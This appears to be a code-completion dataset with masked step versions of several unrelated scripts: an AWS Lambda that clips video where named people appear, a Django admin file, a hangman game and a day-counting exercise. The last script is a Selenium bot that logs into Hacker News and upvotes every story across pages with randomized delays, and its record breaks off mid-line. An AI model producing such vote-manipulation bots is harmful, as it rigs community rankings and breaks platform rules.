"step-3": "<mask token>\nregionName = os.environ['AWS_REGION']\nBUCKET_PATH = os.environ['BUCKET_PATH']\nSENSITIVIT = os.environ['SENSITIVIT']\ns3_client = boto3.client('s3', region_name=regionName)\nddb_resource = boto3.resource('dynamodb', region_name=regionName)\n\n\ndef lambda_handler(event, context):\n body = event\n videoPath = str(body['videoPath'])\n templatePath = str(body['templatePath'])\n facePath = str(body['facePath'])\n targetPeople = str(body['targetPeople'])\n FACES_BUCKET = facePath.split('/')[2]\n FACES_OBJECT = '/'.join(facePath.split('/')[3:])\n s3_client.download_file(FACES_BUCKET, FACES_OBJECT, '/tmp/faces.json')\n facesJson = open('/tmp/faces.json', 'r')\n facesData = json.load(facesJson)\n FRAME_RATE = int(facesData['VideoMetadata']['FrameRate'])\n PEOPLE = targetPeople.split(',')\n timeStamps = []\n scenesTime = []\n i = 0\n while i < len(facesData['Persons']):\n try:\n for target in PEOPLE:\n if facesData['Persons'][i]['FaceMatches'] == []:\n pass\n elif facesData['Persons'][i]['FaceMatches'][0]['Face'][\n 'ExternalImageId'] == target.strip():\n timeStamps.append(facesData['Persons'][i]['Timestamp'])\n except IndexError:\n pass\n i = i + 1\n timeCollection = [[timeStamps[0]]]\n i = 1\n j = 0\n while i < len(timeStamps):\n if timeStamps[i] - timeCollection[j][-1] <= 1000:\n timeCollection[j].append(timeStamps[i])\n i = i + 1\n else:\n j = j + 1\n timeCollection.append([timeStamps[i]])\n for collection in timeCollection:\n if collection[-1] - collection[0] >= 1000:\n if collection[0] % 1000 == 0:\n start = datetime.datetime.utcfromtimestamp(collection[0] //\n 1000).strftime('%H:%M:%S') + ':00'\n elif int(collection[0] % 1000 / 1000 * FRAME_RATE) < 10:\n start = datetime.datetime.utcfromtimestamp(collection[0] //\n 1000).strftime('%H:%M:%S') + ':0' + str(int(collection[\n 0] % 1000 / 1000 * FRAME_RATE))\n else:\n start = datetime.datetime.utcfromtimestamp(collection[0] //\n 1000).strftime('%H:%M:%S') + ':' + str(int(collection[0\n ] % 1000 / 1000 * FRAME_RATE))\n if collection[-1] % 1000 == 0:\n end = datetime.datetime.utcfromtimestamp(collection[-1] // 1000\n ).strftime('%H:%M:%S') + ':00'\n elif int(collection[-1] % 1000 / 1000 * FRAME_RATE) < 10:\n end = datetime.datetime.utcfromtimestamp(collection[-1] // 1000\n ).strftime('%H:%M:%S') + ':0' + str(int(collection[-1] %\n 1000 / 1000 * FRAME_RATE))\n else:\n end = datetime.datetime.utcfromtimestamp(collection[-1] // 1000\n ).strftime('%H:%M:%S') + ':' + str(int(collection[-1] %\n 1000 / 1000 * FRAME_RATE))\n scenesTime.append((start, end))\n else:\n pass\n JOB_BUCKET = templatePath.split('/')[2]\n JOB_OBJECT = '/'.join(templatePath.split('/')[3:])\n s3_client.download_file(JOB_BUCKET, JOB_OBJECT, '/tmp/job-template.json')\n finalName = []\n for people in PEOPLE:\n finalName.append(people.strip())\n OUTPUT_NAME = '-' + '-'.join(finalName)\n with open('/tmp/job-template.json', 'r') as r:\n template = json.load(r)\n for scene in scenesTime:\n template['Settings']['Inputs'][0]['InputClippings'].append({\n 'StartTimecode': scene[0], 'EndTimecode': scene[-1]})\n template['Settings']['Inputs'][0]['FileInput'] = videoPath\n template['Settings']['OutputGroups'][0]['Outputs'][0]['NameModifier'\n ] = OUTPUT_NAME\n template['Settings']['OutputGroups'][0]['OutputGroupSettings'][\n 'FileGroupSettings']['Destination'] = BUCKET_PATH\n with open('/tmp/job-all.json', 'w') as w:\n json.dump(template, w, indent=2)\n w.close()\n r.close()\n mediaconvert_client = boto3.client('mediaconvert', region_name=regionName)\n response = mediaconvert_client.describe_endpoints(Mode='DEFAULT')\n mediaURL = response['Endpoints'][0]['Url']\n mediaconvert_client = boto3.client('mediaconvert', endpoint_url=mediaURL)\n with open('/tmp/job-all.json', 'r') as jsonfile:\n job_object = json.load(jsonfile)\n mediaconvert_client.create_job(**job_object)\n output = {'videoPath': videoPath, 'templatePath': templatePath,\n 'facePath': facePath, 'targetPerson': targetPeople, 'Frame Rate':\n FRAME_RATE}\n return {'statusCode': 200, 'body': json.dumps(output)}\n",
"step-4": "import json\nimport boto3\nimport os\nimport datetime\nregionName = os.environ['AWS_REGION']\nBUCKET_PATH = os.environ['BUCKET_PATH']\nSENSITIVIT = os.environ['SENSITIVIT']\ns3_client = boto3.client('s3', region_name=regionName)\nddb_resource = boto3.resource('dynamodb', region_name=regionName)\n\n\ndef lambda_handler(event, context):\n body = event\n videoPath = str(body['videoPath'])\n templatePath = str(body['templatePath'])\n facePath = str(body['facePath'])\n targetPeople = str(body['targetPeople'])\n FACES_BUCKET = facePath.split('/')[2]\n FACES_OBJECT = '/'.join(facePath.split('/')[3:])\n s3_client.download_file(FACES_BUCKET, FACES_OBJECT, '/tmp/faces.json')\n facesJson = open('/tmp/faces.json', 'r')\n facesData = json.load(facesJson)\n FRAME_RATE = int(facesData['VideoMetadata']['FrameRate'])\n PEOPLE = targetPeople.split(',')\n timeStamps = []\n scenesTime = []\n i = 0\n while i < len(facesData['Persons']):\n try:\n for target in PEOPLE:\n if facesData['Persons'][i]['FaceMatches'] == []:\n pass\n elif facesData['Persons'][i]['FaceMatches'][0]['Face'][\n 'ExternalImageId'] == target.strip():\n timeStamps.append(facesData['Persons'][i]['Timestamp'])\n except IndexError:\n pass\n i = i + 1\n timeCollection = [[timeStamps[0]]]\n i = 1\n j = 0\n while i < len(timeStamps):\n if timeStamps[i] - timeCollection[j][-1] <= 1000:\n timeCollection[j].append(timeStamps[i])\n i = i + 1\n else:\n j = j + 1\n timeCollection.append([timeStamps[i]])\n for collection in timeCollection:\n if collection[-1] - collection[0] >= 1000:\n if collection[0] % 1000 == 0:\n start = datetime.datetime.utcfromtimestamp(collection[0] //\n 1000).strftime('%H:%M:%S') + ':00'\n elif int(collection[0] % 1000 / 1000 * FRAME_RATE) < 10:\n start = datetime.datetime.utcfromtimestamp(collection[0] //\n 1000).strftime('%H:%M:%S') + ':0' + str(int(collection[\n 0] % 1000 / 1000 * FRAME_RATE))\n else:\n start = datetime.datetime.utcfromtimestamp(collection[0] //\n 1000).strftime('%H:%M:%S') + ':' + str(int(collection[0\n ] % 1000 / 1000 * FRAME_RATE))\n if collection[-1] % 1000 == 0:\n end = datetime.datetime.utcfromtimestamp(collection[-1] // 1000\n ).strftime('%H:%M:%S') + ':00'\n elif int(collection[-1] % 1000 / 1000 * FRAME_RATE) < 10:\n end = datetime.datetime.utcfromtimestamp(collection[-1] // 1000\n ).strftime('%H:%M:%S') + ':0' + str(int(collection[-1] %\n 1000 / 1000 * FRAME_RATE))\n else:\n end = datetime.datetime.utcfromtimestamp(collection[-1] // 1000\n ).strftime('%H:%M:%S') + ':' + str(int(collection[-1] %\n 1000 / 1000 * FRAME_RATE))\n scenesTime.append((start, end))\n else:\n pass\n JOB_BUCKET = templatePath.split('/')[2]\n JOB_OBJECT = '/'.join(templatePath.split('/')[3:])\n s3_client.download_file(JOB_BUCKET, JOB_OBJECT, '/tmp/job-template.json')\n finalName = []\n for people in PEOPLE:\n finalName.append(people.strip())\n OUTPUT_NAME = '-' + '-'.join(finalName)\n with open('/tmp/job-template.json', 'r') as r:\n template = json.load(r)\n for scene in scenesTime:\n template['Settings']['Inputs'][0]['InputClippings'].append({\n 'StartTimecode': scene[0], 'EndTimecode': scene[-1]})\n template['Settings']['Inputs'][0]['FileInput'] = videoPath\n template['Settings']['OutputGroups'][0]['Outputs'][0]['NameModifier'\n ] = OUTPUT_NAME\n template['Settings']['OutputGroups'][0]['OutputGroupSettings'][\n 'FileGroupSettings']['Destination'] = BUCKET_PATH\n with open('/tmp/job-all.json', 'w') as w:\n json.dump(template, w, indent=2)\n w.close()\n r.close()\n mediaconvert_client = boto3.client('mediaconvert', region_name=regionName)\n response = mediaconvert_client.describe_endpoints(Mode='DEFAULT')\n mediaURL = response['Endpoints'][0]['Url']\n mediaconvert_client = boto3.client('mediaconvert', endpoint_url=mediaURL)\n with open('/tmp/job-all.json', 'r') as jsonfile:\n job_object = json.load(jsonfile)\n mediaconvert_client.create_job(**job_object)\n output = {'videoPath': videoPath, 'templatePath': templatePath,\n 'facePath': facePath, 'targetPerson': targetPeople, 'Frame Rate':\n FRAME_RATE}\n return {'statusCode': 200, 'body': json.dumps(output)}\n",
"step-5": "import json\nimport boto3\nimport os\nimport datetime\n\n\nregionName = os.environ['AWS_REGION']\nBUCKET_PATH = os.environ['BUCKET_PATH']\nSENSITIVIT = os.environ['SENSITIVIT']\n\ns3_client = boto3.client('s3', region_name=regionName)\nddb_resource = boto3.resource('dynamodb', region_name=regionName)\n\ndef lambda_handler(event, context):\n# body = json.loads(event['body'])\n body = event\n videoPath = str(body['videoPath'])\n templatePath = str(body['templatePath'])\n facePath = str(body['facePath'])\n targetPeople = str(body['targetPeople'])\n \n FACES_BUCKET = facePath.split('/')[2]\n FACES_OBJECT = '/'.join(facePath.split('/')[3:])\n \n s3_client.download_file(FACES_BUCKET, FACES_OBJECT, '/tmp/faces.json')\n facesJson = open('/tmp/faces.json', 'r')\n facesData = json.load(facesJson)\n \n FRAME_RATE = int(facesData['VideoMetadata']['FrameRate'])\n \n PEOPLE = targetPeople.split(',')\n \n timeStamps = []\n scenesTime = []\n \n i = 0\n while i < len(facesData['Persons']):\n try:\n for target in PEOPLE:\n if facesData['Persons'][i]['FaceMatches'] == []:\n pass\n elif facesData['Persons'][i]['FaceMatches'][0]['Face']['ExternalImageId'] == target.strip():\n timeStamps.append(facesData['Persons'][i]['Timestamp'])\n except IndexError:\n pass\n i = i+1\n \n timeCollection = [[timeStamps[0]]]\n i = 1\n j = 0\n while i < len(timeStamps):\n if timeStamps[i] - timeCollection[j][-1] <= 1000:\n timeCollection[j].append(timeStamps[i])\n i = i+1\n else:\n j = j+1\n timeCollection.append([timeStamps[i]])\n \n for collection in timeCollection:\n if collection[-1] - collection[0] >= 1000:\n if collection[0] % 1000 == 0:\n start = datetime.datetime.utcfromtimestamp(collection[0]//1000).strftime(\"%H:%M:%S\") + ':00'\n elif int(collection[0] % 1000 / 1000 * FRAME_RATE) < 10:\n start = datetime.datetime.utcfromtimestamp(collection[0] // 1000).strftime(\"%H:%M:%S\") + ':0' + str(int(collection[0] % 1000 / 1000 * FRAME_RATE))\n else:\n start = datetime.datetime.utcfromtimestamp(collection[0]//1000).strftime(\"%H:%M:%S\") + ':' + str(int(collection[0] % 1000 / 1000 * FRAME_RATE))\n if collection[-1] % 1000 == 0:\n end = datetime.datetime.utcfromtimestamp(collection[-1] // 1000).strftime(\"%H:%M:%S\") + ':00'\n elif int(collection[-1] % 1000 / 1000 * FRAME_RATE) < 10:\n end = datetime.datetime.utcfromtimestamp(collection[-1] // 1000).strftime(\"%H:%M:%S\") + ':0' + str(int(collection[-1] % 1000 / 1000 * FRAME_RATE))\n else:\n end = datetime.datetime.utcfromtimestamp(collection[-1] // 1000).strftime(\"%H:%M:%S\") + ':' + str(int(collection[-1] % 1000 / 1000 * FRAME_RATE))\n scenesTime.append((start,end))\n else:\n pass\n \n JOB_BUCKET = templatePath.split('/')[2]\n JOB_OBJECT = '/'.join(templatePath.split('/')[3:])\n s3_client.download_file(JOB_BUCKET, JOB_OBJECT, '/tmp/job-template.json')\n \n finalName = []\n for people in PEOPLE:\n finalName.append(people.strip())\n \n OUTPUT_NAME = '-'+'-'.join(finalName)\n \n with open('/tmp/job-template.json', 'r') as r:\n template = json.load(r)\n for scene in scenesTime:\n template['Settings']['Inputs'][0]['InputClippings'].append({'StartTimecode': scene[0], 'EndTimecode': scene[-1]})\n template['Settings']['Inputs'][0]['FileInput'] = videoPath\n template['Settings']['OutputGroups'][0]['Outputs'][0]['NameModifier'] = OUTPUT_NAME\n template['Settings']['OutputGroups'][0]['OutputGroupSettings']['FileGroupSettings']['Destination'] = BUCKET_PATH\n with open('/tmp/job-all.json', 'w') as w:\n json.dump(template, w, indent=2)\n w.close()\n r.close()\n \n mediaconvert_client = boto3.client('mediaconvert', region_name=regionName)\n\n response = mediaconvert_client.describe_endpoints(Mode='DEFAULT')\n \n mediaURL = response['Endpoints'][0]['Url']\n \n mediaconvert_client = boto3.client('mediaconvert',endpoint_url=mediaURL)\n \n with open(\"/tmp/job-all.json\", \"r\") as jsonfile:\n job_object = json.load(jsonfile)\n \n mediaconvert_client.create_job(**job_object)\n \n \n output = {'videoPath': videoPath,\n 'templatePath': templatePath,\n 'facePath': facePath,\n 'targetPerson': targetPeople,\n 'Frame Rate': FRAME_RATE\n }\n return {\n 'statusCode': 200,\n 'body': json.dumps(output)\n }\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from django.contrib import admin
# Register your models here.
from .models import HuyenQuan
admin.site.register(HuyenQuan)
|
normal
|
{
"blob_id": "16e5a44cb4fbe71eaa9c1f5b00505578de0d2cea",
"index": 6403,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nadmin.site.register(HuyenQuan)\n",
"step-3": "from django.contrib import admin\nfrom .models import HuyenQuan\nadmin.site.register(HuyenQuan)\n",
"step-4": "from django.contrib import admin\n\n# Register your models here.\nfrom .models import HuyenQuan\n\nadmin.site.register(HuyenQuan)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# -*- coding: utf-8 -*-
import random
IMAGES = ['''
+---+
| |
|
|
|
|
=========''', '''
+---+
| |
O |
|
|
|
=========''', '''
+---+
| |
O |
| |
|
|
=========''', '''
+---+
| |
O |
/| |
|
|
=========''', '''
+---+
| |
O |
/|\ |
|
|
=========''', '''
+---+
| |
O |
/|\ |
| |
|
=========''', '''
+---+
| |
O |
/|\ |
| |
/ |
=========''', '''
+---+
| |
O |
/|\ |
| |
/ \ |
=========''', '''
''']
WORDS = [
'lavadora',
'secadora',
'sofa',
'gobierno',
'diputado',
'democracia',
'computadora',
'teclado'
]
# Funcion que regresa una palabra aleatoria
def randomWord():
id = random.randint(0, len(WORDS) - 1)
return WORDS[id]
def displayBoard(hiddenWord, tries):
print(IMAGES[tries] + '\n')
print(hiddenWord)
print('--- * --- * --- * --- * --- * ---')
def run():
word = randomWord()
hiddenWord = ['-'] * len(word)
tries = 0
while True:
displayBoard(hiddenWord, tries)
currentLetter = str(raw_input('Escoge una letra: '))
letterIndexes = []
for i in range(len(word)):
if word[i] == currentLetter:
letterIndexes.append(i)
if len(letterIndexes) == 0:
tries += 1
# Checa si perdio el jugador
if tries == len(IMAGES) - 2:
displayBoard(hiddenWord, tries)
print('\nLo sentimos, perdiste. La palabra correcta era {}'.format(word))
break
else:
for id in letterIndexes:
hiddenWord[id] = currentLetter
letterIndexes = []
# Chea si gano el jugador
try:
hiddenWord.index('-')
except ValueError:
print('\nFelicidades. Ganaste. La palabra es: {}'.format(word))
break
if __name__ == '__main__':
print('B I E N V E N I D O S A A H O R C A D O S')
run()
|
normal
|
{
"blob_id": "074defa92c8bc5afc221c9c19842d808fbf1e112",
"index": 197,
"step-1": "<mask token>\n\n\ndef run():\n word = randomWord()\n hiddenWord = ['-'] * len(word)\n tries = 0\n while True:\n displayBoard(hiddenWord, tries)\n currentLetter = str(raw_input('Escoge una letra: '))\n letterIndexes = []\n for i in range(len(word)):\n if word[i] == currentLetter:\n letterIndexes.append(i)\n if len(letterIndexes) == 0:\n tries += 1\n if tries == len(IMAGES) - 2:\n displayBoard(hiddenWord, tries)\n print('\\nLo sentimos, perdiste. La palabra correcta era {}'\n .format(word))\n break\n else:\n for id in letterIndexes:\n hiddenWord[id] = currentLetter\n letterIndexes = []\n try:\n hiddenWord.index('-')\n except ValueError:\n print('\\nFelicidades. Ganaste. La palabra es: {}'.format(word))\n break\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef randomWord():\n id = random.randint(0, len(WORDS) - 1)\n return WORDS[id]\n\n\ndef displayBoard(hiddenWord, tries):\n print(IMAGES[tries] + '\\n')\n print(hiddenWord)\n print('--- * --- * --- * --- * --- * ---')\n\n\ndef run():\n word = randomWord()\n hiddenWord = ['-'] * len(word)\n tries = 0\n while True:\n displayBoard(hiddenWord, tries)\n currentLetter = str(raw_input('Escoge una letra: '))\n letterIndexes = []\n for i in range(len(word)):\n if word[i] == currentLetter:\n letterIndexes.append(i)\n if len(letterIndexes) == 0:\n tries += 1\n if tries == len(IMAGES) - 2:\n displayBoard(hiddenWord, tries)\n print('\\nLo sentimos, perdiste. La palabra correcta era {}'\n .format(word))\n break\n else:\n for id in letterIndexes:\n hiddenWord[id] = currentLetter\n letterIndexes = []\n try:\n hiddenWord.index('-')\n except ValueError:\n print('\\nFelicidades. Ganaste. La palabra es: {}'.format(word))\n break\n\n\nif __name__ == '__main__':\n print('B I E N V E N I D O S A A H O R C A D O S')\n run()\n",
"step-3": "<mask token>\nIMAGES = [\n \"\"\"\n\n +---+\n | |\n |\n |\n |\n |\n =========\"\"\"\n ,\n \"\"\"\n\n +---+\n | |\n O |\n |\n |\n |\n =========\"\"\"\n ,\n \"\"\"\n\n +---+\n | |\n O |\n | |\n |\n |\n =========\"\"\"\n ,\n \"\"\"\n \n +---+\n | |\n O |\n /| |\n |\n |\n =========\"\"\"\n ,\n \"\"\"\n \n +---+\n | |\n O |\n /|\\\\ |\n |\n |\n =========\"\"\"\n ,\n \"\"\"\n \n +---+\n | |\n O |\n /|\\\\ |\n | |\n |\n =========\"\"\"\n ,\n \"\"\"\n \n +---+\n | |\n O |\n /|\\\\ |\n | |\n / |\n =========\"\"\"\n ,\n \"\"\"\n \n +---+\n | |\n O |\n /|\\\\ |\n | |\n / \\\\ |\n =========\"\"\"\n , '\\n']\nWORDS = ['lavadora', 'secadora', 'sofa', 'gobierno', 'diputado',\n 'democracia', 'computadora', 'teclado']\n\n\ndef randomWord():\n id = random.randint(0, len(WORDS) - 1)\n return WORDS[id]\n\n\ndef displayBoard(hiddenWord, tries):\n print(IMAGES[tries] + '\\n')\n print(hiddenWord)\n print('--- * --- * --- * --- * --- * ---')\n\n\ndef run():\n word = randomWord()\n hiddenWord = ['-'] * len(word)\n tries = 0\n while True:\n displayBoard(hiddenWord, tries)\n currentLetter = str(raw_input('Escoge una letra: '))\n letterIndexes = []\n for i in range(len(word)):\n if word[i] == currentLetter:\n letterIndexes.append(i)\n if len(letterIndexes) == 0:\n tries += 1\n if tries == len(IMAGES) - 2:\n displayBoard(hiddenWord, tries)\n print('\\nLo sentimos, perdiste. La palabra correcta era {}'\n .format(word))\n break\n else:\n for id in letterIndexes:\n hiddenWord[id] = currentLetter\n letterIndexes = []\n try:\n hiddenWord.index('-')\n except ValueError:\n print('\\nFelicidades. Ganaste. La palabra es: {}'.format(word))\n break\n\n\nif __name__ == '__main__':\n print('B I E N V E N I D O S A A H O R C A D O S')\n run()\n",
"step-4": "import random\nIMAGES = [\n \"\"\"\n\n +---+\n | |\n |\n |\n |\n |\n =========\"\"\"\n ,\n \"\"\"\n\n +---+\n | |\n O |\n |\n |\n |\n =========\"\"\"\n ,\n \"\"\"\n\n +---+\n | |\n O |\n | |\n |\n |\n =========\"\"\"\n ,\n \"\"\"\n \n +---+\n | |\n O |\n /| |\n |\n |\n =========\"\"\"\n ,\n \"\"\"\n \n +---+\n | |\n O |\n /|\\\\ |\n |\n |\n =========\"\"\"\n ,\n \"\"\"\n \n +---+\n | |\n O |\n /|\\\\ |\n | |\n |\n =========\"\"\"\n ,\n \"\"\"\n \n +---+\n | |\n O |\n /|\\\\ |\n | |\n / |\n =========\"\"\"\n ,\n \"\"\"\n \n +---+\n | |\n O |\n /|\\\\ |\n | |\n / \\\\ |\n =========\"\"\"\n , '\\n']\nWORDS = ['lavadora', 'secadora', 'sofa', 'gobierno', 'diputado',\n 'democracia', 'computadora', 'teclado']\n\n\ndef randomWord():\n id = random.randint(0, len(WORDS) - 1)\n return WORDS[id]\n\n\ndef displayBoard(hiddenWord, tries):\n print(IMAGES[tries] + '\\n')\n print(hiddenWord)\n print('--- * --- * --- * --- * --- * ---')\n\n\ndef run():\n word = randomWord()\n hiddenWord = ['-'] * len(word)\n tries = 0\n while True:\n displayBoard(hiddenWord, tries)\n currentLetter = str(raw_input('Escoge una letra: '))\n letterIndexes = []\n for i in range(len(word)):\n if word[i] == currentLetter:\n letterIndexes.append(i)\n if len(letterIndexes) == 0:\n tries += 1\n if tries == len(IMAGES) - 2:\n displayBoard(hiddenWord, tries)\n print('\\nLo sentimos, perdiste. La palabra correcta era {}'\n .format(word))\n break\n else:\n for id in letterIndexes:\n hiddenWord[id] = currentLetter\n letterIndexes = []\n try:\n hiddenWord.index('-')\n except ValueError:\n print('\\nFelicidades. Ganaste. La palabra es: {}'.format(word))\n break\n\n\nif __name__ == '__main__':\n print('B I E N V E N I D O S A A H O R C A D O S')\n run()\n",
"step-5": "# -*- coding: utf-8 -*-\n\nimport random\n\nIMAGES = ['''\n\n +---+\n | |\n |\n |\n |\n |\n =========''', '''\n\n +---+\n | |\n O |\n |\n |\n |\n =========''', '''\n\n +---+\n | |\n O |\n | |\n |\n |\n =========''', '''\n \n +---+\n | |\n O |\n /| |\n |\n |\n =========''', '''\n \n +---+\n | |\n O |\n /|\\ |\n |\n |\n =========''', '''\n \n +---+\n | |\n O |\n /|\\ |\n | |\n |\n =========''', '''\n \n +---+\n | |\n O |\n /|\\ |\n | |\n / |\n =========''', '''\n \n +---+\n | |\n O |\n /|\\ |\n | |\n / \\ |\n =========''', '''\n''']\n\nWORDS = [\n 'lavadora',\n 'secadora',\n 'sofa',\n 'gobierno',\n 'diputado',\n 'democracia',\n 'computadora',\n 'teclado'\n]\n\n# Funcion que regresa una palabra aleatoria\ndef randomWord():\n id = random.randint(0, len(WORDS) - 1)\n return WORDS[id]\n\ndef displayBoard(hiddenWord, tries):\n print(IMAGES[tries] + '\\n')\n print(hiddenWord)\n print('--- * --- * --- * --- * --- * ---')\n\ndef run():\n word = randomWord()\n hiddenWord = ['-'] * len(word)\n tries = 0\n\n while True:\n displayBoard(hiddenWord, tries)\n currentLetter = str(raw_input('Escoge una letra: '))\n\n letterIndexes = []\n for i in range(len(word)):\n if word[i] == currentLetter:\n letterIndexes.append(i)\n\n if len(letterIndexes) == 0:\n tries += 1\n\n # Checa si perdio el jugador\n if tries == len(IMAGES) - 2:\n displayBoard(hiddenWord, tries)\n print('\\nLo sentimos, perdiste. La palabra correcta era {}'.format(word))\n break\n else:\n for id in letterIndexes:\n hiddenWord[id] = currentLetter\n\n letterIndexes = []\n\n # Chea si gano el jugador\n try:\n hiddenWord.index('-')\n except ValueError:\n print('\\nFelicidades. Ganaste. La palabra es: {}'.format(word))\n break\n\nif __name__ == '__main__':\n print('B I E N V E N I D O S A A H O R C A D O S')\n run()",
"step-ids": [
1,
4,
5,
6,
7
]
}
|
[
1,
4,
5,
6,
7
] |
"""
exercise 9-7-9-2
"""
fname = raw_input("Enter file name: ")
filehandle = open(fname)
d = dict()
for line in filehandle:
newline = line.split()
if newline != [] and newline[0] == 'From':
day = newline[2]
if day not in d:
d[day] = 1
else:
d[day] += 1
print d
|
normal
|
{
"blob_id": "7beb9d9e24f4c9a4e1a486048371da79c35d0927",
"index": 8527,
"step-1": "\"\"\"\r\nexercise 9-7-9-2\r\n\r\n\"\"\"\r\n\r\nfname = raw_input(\"Enter file name: \")\r\nfilehandle = open(fname)\r\nd = dict()\r\nfor line in filehandle:\r\n newline = line.split()\r\n if newline != [] and newline[0] == 'From':\r\n day = newline[2]\r\n if day not in d:\r\n d[day] = 1\r\n else:\r\n d[day] += 1\r\nprint d \r\n ",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
import random
PATH = "C:\\Program Files (x86)\\chromedriver.exe"
destination = "https://news.ycombinator.com/"
class hackernewsUpvoter():
def __init__(self, username, password, website):
self.driver = webdriver.Chrome(PATH)
self.username = username
self.password = password
self.website = website
def sign_in(self, login_page="https://news.ycombinator.com/login"):
# Go to hackernews's website
self.driver.get(login_page)
time.sleep(2)
# Enter username
account = self.driver.find_element_by_name('acct')
account.send_keys(self.username)
# Enter password
password = self.driver.find_element_by_name('pw')
password.send_keys(self.password)
time.sleep(random.randrange(11,35)/10)
# Click enter key
password.send_keys(Keys.RETURN)
def upvoter(self):
upvoteButtons = self.driver.find_elements_by_class_name("votearrow")
# Click every upvote buttons in the page
for button in upvoteButtons:
try:
button.click()
time.sleep(1)
except:
print("The upvote button wasn't clickable")
pass
def goto_page(self, page):
self.driver.get("https://news.ycombinator.com/news?p={}".format(page))
def next_page(self):
more = self.driver.find_elements_by_class_name("morelink")
more[0].click()
bot = hackernewsUpvoter(input(), input(), destination)
bot.sign_in()
for i in range(3,5):
bot.upvoter()
bot.goto_page(i)
time.sleep(random.randrange(300,500)/100)
|
normal
|
{
"blob_id": "742b655ee6aad2575f67e7329ed7a14c4fb6aa06",
"index": 7242,
"step-1": "<mask token>\n\n\nclass hackernewsUpvoter:\n <mask token>\n\n def sign_in(self, login_page='https://news.ycombinator.com/login'):\n self.driver.get(login_page)\n time.sleep(2)\n account = self.driver.find_element_by_name('acct')\n account.send_keys(self.username)\n password = self.driver.find_element_by_name('pw')\n password.send_keys(self.password)\n time.sleep(random.randrange(11, 35) / 10)\n password.send_keys(Keys.RETURN)\n <mask token>\n\n def goto_page(self, page):\n self.driver.get('https://news.ycombinator.com/news?p={}'.format(page))\n\n def next_page(self):\n more = self.driver.find_elements_by_class_name('morelink')\n more[0].click()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass hackernewsUpvoter:\n\n def __init__(self, username, password, website):\n self.driver = webdriver.Chrome(PATH)\n self.username = username\n self.password = password\n self.website = website\n\n def sign_in(self, login_page='https://news.ycombinator.com/login'):\n self.driver.get(login_page)\n time.sleep(2)\n account = self.driver.find_element_by_name('acct')\n account.send_keys(self.username)\n password = self.driver.find_element_by_name('pw')\n password.send_keys(self.password)\n time.sleep(random.randrange(11, 35) / 10)\n password.send_keys(Keys.RETURN)\n <mask token>\n\n def goto_page(self, page):\n self.driver.get('https://news.ycombinator.com/news?p={}'.format(page))\n\n def next_page(self):\n more = self.driver.find_elements_by_class_name('morelink')\n more[0].click()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass hackernewsUpvoter:\n\n def __init__(self, username, password, website):\n self.driver = webdriver.Chrome(PATH)\n self.username = username\n self.password = password\n self.website = website\n\n def sign_in(self, login_page='https://news.ycombinator.com/login'):\n self.driver.get(login_page)\n time.sleep(2)\n account = self.driver.find_element_by_name('acct')\n account.send_keys(self.username)\n password = self.driver.find_element_by_name('pw')\n password.send_keys(self.password)\n time.sleep(random.randrange(11, 35) / 10)\n password.send_keys(Keys.RETURN)\n\n def upvoter(self):\n upvoteButtons = self.driver.find_elements_by_class_name('votearrow')\n for button in upvoteButtons:\n try:\n button.click()\n time.sleep(1)\n except:\n print(\"The upvote button wasn't clickable\")\n pass\n\n def goto_page(self, page):\n self.driver.get('https://news.ycombinator.com/news?p={}'.format(page))\n\n def next_page(self):\n more = self.driver.find_elements_by_class_name('morelink')\n more[0].click()\n\n\n<mask token>\nbot.sign_in()\nfor i in range(3, 5):\n bot.upvoter()\n bot.goto_page(i)\n time.sleep(random.randrange(300, 500) / 100)\n",
"step-4": "<mask token>\nPATH = 'C:\\\\Program Files (x86)\\\\chromedriver.exe'\ndestination = 'https://news.ycombinator.com/'\n\n\nclass hackernewsUpvoter:\n\n def __init__(self, username, password, website):\n self.driver = webdriver.Chrome(PATH)\n self.username = username\n self.password = password\n self.website = website\n\n def sign_in(self, login_page='https://news.ycombinator.com/login'):\n self.driver.get(login_page)\n time.sleep(2)\n account = self.driver.find_element_by_name('acct')\n account.send_keys(self.username)\n password = self.driver.find_element_by_name('pw')\n password.send_keys(self.password)\n time.sleep(random.randrange(11, 35) / 10)\n password.send_keys(Keys.RETURN)\n\n def upvoter(self):\n upvoteButtons = self.driver.find_elements_by_class_name('votearrow')\n for button in upvoteButtons:\n try:\n button.click()\n time.sleep(1)\n except:\n print(\"The upvote button wasn't clickable\")\n pass\n\n def goto_page(self, page):\n self.driver.get('https://news.ycombinator.com/news?p={}'.format(page))\n\n def next_page(self):\n more = self.driver.find_elements_by_class_name('morelink')\n more[0].click()\n\n\nbot = hackernewsUpvoter(input(), input(), destination)\nbot.sign_in()\nfor i in range(3, 5):\n bot.upvoter()\n bot.goto_page(i)\n time.sleep(random.randrange(300, 500) / 100)\n",
"step-5": "from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport time\nimport random\n\nPATH = \"C:\\\\Program Files (x86)\\\\chromedriver.exe\"\ndestination = \"https://news.ycombinator.com/\"\n\nclass hackernewsUpvoter():\n def __init__(self, username, password, website):\n self.driver = webdriver.Chrome(PATH) \n self.username = username\n self.password = password\n self.website = website\n\n def sign_in(self, login_page=\"https://news.ycombinator.com/login\"):\n # Go to hackernews's website\n self.driver.get(login_page)\n time.sleep(2)\n\n # Enter username \n account = self.driver.find_element_by_name('acct')\n account.send_keys(self.username)\n\n # Enter password\n password = self.driver.find_element_by_name('pw')\n password.send_keys(self.password)\n time.sleep(random.randrange(11,35)/10)\n\n # Click enter key\n password.send_keys(Keys.RETURN)\n \n def upvoter(self):\n upvoteButtons = self.driver.find_elements_by_class_name(\"votearrow\")\n\n # Click every upvote buttons in the page \n for button in upvoteButtons:\n try: \n button.click()\n time.sleep(1)\n except: \n print(\"The upvote button wasn't clickable\")\n pass\n \n def goto_page(self, page):\n self.driver.get(\"https://news.ycombinator.com/news?p={}\".format(page))\n\n def next_page(self):\n more = self.driver.find_elements_by_class_name(\"morelink\")\n more[0].click()\n\nbot = hackernewsUpvoter(input(), input(), 